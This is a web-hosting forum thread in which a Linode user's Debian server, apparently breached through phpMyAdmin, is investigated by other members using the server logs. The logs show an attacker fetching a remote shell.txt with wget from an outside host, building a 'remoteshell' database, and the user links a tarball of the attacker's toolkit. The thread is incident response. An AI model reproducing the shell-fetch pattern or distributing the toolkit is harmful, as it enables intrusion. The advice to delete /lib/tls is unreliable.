Someone setup a ftp site on my linode.

Hello,

It looks like someone decided to exploit something on my system and setup a ftp site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian setup. I am running the testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.

Thanks!

15 Replies

@tavella81:

Hello,

It looks like someone decided to exploit something on my system and setup a ftp site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian setup. I am running the testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.

Thanks!

What web applications you have on your website? One of them may have a vulnerability some attacker used to gain access to your Linode.

I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well…. live and learn. I guess the best part is I have the IP's of the person who created/accessed and all of the people who were downloading the software off of my system. I think I'm going to contact their ISP's.

@tavella81:

I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well…. live and learn. I guess the best part is I have the IP's of the person who created/accessed and all of the people who were downloading the software off of my system. I think I'm going to contact their ISP's.

Review your webserver logs, see what they did. I'd love to know what they exploited. I'm willing to spend a few minutes and review your webserver logs if you want.

Thanks. I'll post them… I'll tar the entire package

http://www.avella.name/hack.tar

The tar is almost 26 megs. It includes their little toolkit. I found it because I did a ps -ax like I normally do and saw ./ftpd running… First clue that wasnt me…. Thanks!

Oh! the old.php was in my /var/www directory with the owner of mysql:mysql

``` [Fri Dec 30 19:22:42 2005] [error] [client 84.159.66.132] File does not exist: /var/www/avella/phpmyadmin/css/themes, referer: http://www.avella.name/phpmyadmin /css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right&js_isDOM=1 --19:22:59-- http://mitglied.lycos.de/oldmeal1/shell.txt =>shell.txt'
Resolving mitglied.lycos.de… 212.78.204.20
Connecting to mitglied.lycos.de|212.78.204.20|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5,211 (5.1K) [text/plain]

0K .....                                                 100%   34.71 KB/s

19:23:00 (34.71 KB/s) - `shell.txt' saved [5211/5211]

````

That's from your error log, can you tar up (and gzip please) your access log for 12/30/2005?

Looks like they were xfering through your Linode this game:

http://www.torrentz.com/torrent_381534.html

They may have exploited some portion of MySQL through phpMyAdmin, using a database called remoteshell:

84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&collationconnection=utf8generalci&db=remoteshell&goto=dbdetailsstructure.php&sqlquery=DROP+DATABASE+

%60remoteshell%60&zerorows=Datenbank+%60remoteshell%60+wurde+gel%C3%B6scht.&goto=main.php&back=dbdetailsstructure.php&reload=1&purge=1&isjs_confirmed=1 HTTP/1.1" 200 6635 "http://www.avella.name/ph

pmyadmin/dbdetailsstructure.php?lang=de-utf-8&server=1&collationconnection=utf8general_ci&db=remoteshell" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"

Then they restored a database dump via POST:

84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/readdump.php HTTP/1.1" 200 4760 "http://www.avella.name/phpmyadmin/db_de … =utf8_gene">http://www.avella.name/phpmyadmin/dbdetails.php?lang=de-utf-8&server=1&collationconnection=utf8gene

ralci&db=mysql&goto=dbdetailsstructure.php&dbquery_force=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"

And they did another database dump via POST, which somehow resulted in /old.php getting created.

Because access logs don't log POST data, I can't tell exactly what happened, but I can make an educated guess. The above wget command in the error logs were probally caused by phpmyadmin.css.php, mis-parsing the contents of a database in MySQL. It looks like it may have made PHP execute some PHP code that resided in the remoteshell database.

Can you dump that database to a text file if you've still got it?

[will edit later with more info dug up]

Can you dump the remoteshell mysql database to a text file using mysqldump?

I've never done it before but I'll give it a try…. hold.

Starting MySQL database server: mysqld…failed.

Please take a look at the syslog.

/usr/bin/mysqladmin: connect to server at 'localhost' failed

error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'

Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!

I rebooted my system to make sure that no other programs were running that I wasn't aware of…

If you have an idea as how to restore the mysql server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow-up tomorrow.

It looks like mysqld isn't running. Try starting it via /etc/init.d/mysqld start (if you're running a SysV style distro)

mysqldump -u root -p remoteshell > remoteshell.txt

(the enter your root mysql password at the prompt)

I suffered a similar problem recently which kept killing my MYSQL Server.

Fortunately it restarted with a reboot.

I found a directory under /var/tmp/ that had no name but appeared to contain some sort of pseudo server.

It may be worth checking for this folder.

I checked the folder and kept all of the info. When I run /etc/init.d/mysql start I receive the message above. If I type just mysqld I get the following:

avella:~# mysqld

060103 19:13:11 InnoDB: Database was not shut down normally!

InnoDB: Starting crash recovery.

InnoDB: Reading tablespace information from the .ibd files…

InnoDB: Restoring possible half-written data pages from the doublewrite

InnoDB: buffer…

060103 19:13:12 InnoDB: Starting log scan based on checkpoint at

InnoDB: log sequence number 0 47300.

InnoDB: Doing recovery: scanned up to log sequence number 0 47346

InnoDB: Last MySQL binlog file position 0 79, file name /var/log/mysql/mysql-bin.000121

060103 19:13:12 InnoDB: Flushing modified pages from the buffer pool…

060103 19:13:12 InnoDB: Started; log sequence number 0 47346

060103 19:13:12 [ERROR] Fatal error: Can't open and lock privilege tables: Table 'mysql.host' doesn't exist

I'm lost… I don't want to potentially loose what they posted. How can I go about restoring my data?

@tavella81:

I've never done it before but I'll give it a try…. hold.

Starting MySQL database server: mysqld…failed.

Please take a look at the syslog.

/usr/bin/mysqladmin: connect to server at 'localhost' failed

error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'

Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!

I rebooted my system to make sure that no other programs were running that I wasn't aware of…

If you have an idea as how to restore the mysql server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow-up tomorrow.

Did you do "apt-get upgrade" recently? If so, check if /lib/tls exists. That is evil. You got to watch for it when you do upgrade and remove it every time it shows up again.

I moved /lib/tls to /lib/tls-disabled, ran ldconfig, rebooted but it still didnt work. I did mysqlinstalldb to restore the database but lost all of my settings. Oh well……

Reply

Please enter an answer
Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Community Code of Conduct